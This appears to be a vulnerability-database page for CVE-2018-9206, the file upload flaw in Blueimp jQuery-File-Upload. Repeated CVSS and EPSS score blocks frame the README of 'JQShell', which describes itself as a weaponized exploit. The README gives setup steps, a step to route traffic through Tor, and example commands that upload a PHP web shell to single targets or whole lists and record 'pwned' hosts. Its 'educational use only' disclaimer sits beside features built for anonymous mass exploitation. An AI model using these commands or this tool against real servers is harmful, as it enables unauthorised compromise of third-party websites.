9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.967 High
EPSS
Percentile
99.6%
JQShell
A weaponized version of CVE-2018-9206 (Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0).
Disclaimer
Using this agianst servers you dont control, is illegal in most countries. The author claims no responsibility for the actions of those who use this software for illegal purposes. This software is intended for educational use only. No servers were illegally pwned in the making of this software.
Features
Single Target Multi Target Tor
_
_ Prerequisites
Please install these required packages.
Python3
pip3 install requests pysocks subprocess stem
** ** Tor Control Port
To use tor, in this script, you must edit your torrc file and enable tor control port on 9051.
Typically this file is here: /etc/tor/torrc
open this file and change this line:
#ControlPort 9051
to
ControlPort 9051
restart tor service
** ** Usage
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help show this help message and exit
-l LIST_INIT, --list LIST_INIT
Select for a list of assets to exploit
-t SINGLE_TARGET, --target SINGLE_TARGET
Single exploit target
-s SHELL_LOC, --shell SHELL_LOC
This is required, put the fullpath to your shell
-o OUTPUTZ, --output OUTPUTZ
This is full path to were you want to save your list
of confirmed hosts
-tor, --tor_proxy Select if you have tor installed, you will need to
enable control port
** ** Examples
Running agianst single target.
python3 jqshell.py -t localhost/folderwerejqueryis -s /var/www/html/shell.php
Running agianst single target, with saving output.
python3 jqshell.py -t localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Running a list, with saving output.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
** ** Author
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.967 High
EPSS
Percentile
99.6%